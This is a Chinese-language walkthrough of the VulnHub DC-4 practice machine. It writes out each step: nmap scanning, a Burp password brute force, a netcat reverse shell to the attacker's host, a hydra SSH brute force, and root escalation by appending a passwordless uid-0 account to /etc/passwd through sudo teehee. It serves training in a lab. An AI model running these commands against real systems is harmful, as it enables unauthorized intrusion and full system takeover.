渗透测试靶机练习 DC-4
一、靶机介绍
与之前的靶机是一个系列可在该网站下载搭建
链接:https://www.vulnhub.com/
二、所需工具与思路
Namp:获取IP,端口以及详细信息
burp:爆破破解账号密码
nc反弹shell
hydra爆破密码.
提权
三、渗透测试获取Flag
1.进行主机发现确认主机地址
nmap 192.168.1.0/24
2.对主机进行端口扫描获取详细信息
nmap -p- -A -sV -sS -O 192.168.1.104
开放了80和22端口
3.首先访问80端口
需要账号和密码登录,可以使用burpsuit进行密码爆破
Username:admin
Password:happy
4.建立连接
通过burpsuit抓包,使用nc进行反弹
首先开启nc的监听端口
然后通过burp抓包进行修改,建立连接
nc 192.168.1.106 1234 -e /bin/bash
建立交互式shell便于操作这里我们使用python建立
python -c 'import pty;pty.spawn("/bin/sh")'
5.查看home目录
发现有三个用户,注意查看搜集有用信息,最终在jim用户下发现密码备份
因为开放了ssh连接端口,可以尝试进行远程连接
将密码复制到本地即可使用hydra进行爆破
hydra -l jim -P passwd ssh://192.168.1.104
使用ssh进行远程连接
查看mbox是root用户发来的邮件
进入/var/mail/查看邮件内容
获得带有密码的邮件
切换用户charles
查看拥有哪些权限
sudo -l
发现拥有一个root权限可以免密码执行
查看使用方法
teehee --help
可以使用-a: 附加到给定文件,不覆盖
6.提权
尝试在/etc/passwd文件下追加内容
内容结构
用户名:是否有密码保护(x即有保护):uid:gid:全称:home目录:/bin/bash
当uid=0;gid=0时是root权限
echo "hacker::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
进入root文件获取flag